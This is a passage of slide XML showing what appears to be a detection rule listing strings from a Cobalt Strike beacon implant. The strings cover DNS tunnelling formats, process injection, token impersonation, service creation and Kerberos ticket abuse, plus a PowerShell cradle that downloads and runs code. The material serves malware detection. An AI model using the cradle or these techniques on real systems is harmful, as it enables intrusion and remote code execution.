              </a:rPr>
              <a:t> "false";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	set name    "beacon.dll";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d.%s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"post";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cdn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x%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "www6.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x%08x.%x%x.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s.1%08x.%x%x.%s";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api</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x%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "unknown";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not run command (w/ token) because of its length of %d bytes!";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not spawn %s (token): %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not spawn %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not open process token: %d (%u)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not run %s as %s\\%s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "COMSPEC";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string " /C ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not upload file: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not open %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not get file time: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not set file time: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "127.0.0.1";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not connect to pipe (%s): %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not open service control manager on %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not create service %s on %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not start service %s on %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Started service %s on %s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not query service %s on %s: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not delete service %s on %s: %d";</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SeDebugPrivilege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SeTcbPrivilege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SeCreateTokenPrivilege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SeAssignPrimaryTokenPrivilege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SeLockMemoryPrivilege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SeIncreaseQuotaPrivilege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SeUnsolicitedInputPrivilege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SeMachineAccountPrivilege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SeSecurityPrivilege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SeTakeOwnershipPrivilege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SeLoadDriverPrivilege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SeSystemProfilePrivilege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SeSystemtimePrivilege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SeProfileSingleProcessPrivilege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SeIncreaseBasePriorityPrivilege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SeCreatePagefilePrivilege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SeCreatePermanentPrivilege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SeBackupPrivilege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SeRestorePrivilege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SeShutdownPrivilege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SeAuditPrivilege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SeSystemEnvironmentPrivilege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SeChangeNotifyPrivilege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SeRemoteShutdownPrivilege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SeUndockPrivilege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SeSyncAgentPrivilege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SeEnableDelegationPrivilege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SeManageVolumePrivilege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create service: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not start service: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Failed to impersonate token: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Failed to get token";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "IsWow64Process";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "kernel32";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not open '%s'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s\\%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "copy failed: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "move failed: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "D	0	%02d/%02d/%02d %02d:%02d:%02d	%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "F	%I64d	%02d/%02d/%02d %02d:%02d:%02d	%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Wow64DisableWow64FsRedirection";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Wow64RevertWow64FsRedirection";</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ppid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> %d is in a different desktop session (spawned jobs may fail). Use '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ppid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' to reset.";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not allocate %d bytes in process: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not write to process memory: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not adjust permissions in process: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not create remote thread in %d: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not open process %d: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%d is an x64 process (can't inject x86 content)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%d is an x86 process (can't inject x64 content)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "syswow64";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "system32";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not set PPID to %d: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not set PPID to %d";</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ntdll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NtQueueApcThread</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ld</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string "%.2X";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%.2X:";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "process";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not connect to pipe: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%d	%d	%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Kerberos";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kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ticket purge failed: %08x";</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kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ticket use failed: %08x";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not connect to pipe: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "could not connect to pipe";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Maximum links reached. Disconnect one";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%d	%d	%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d.%d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	%s	%s	%s	%d	%d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not bind to %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Net.Webclient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DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('http://127.0.0.1:%u/')";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
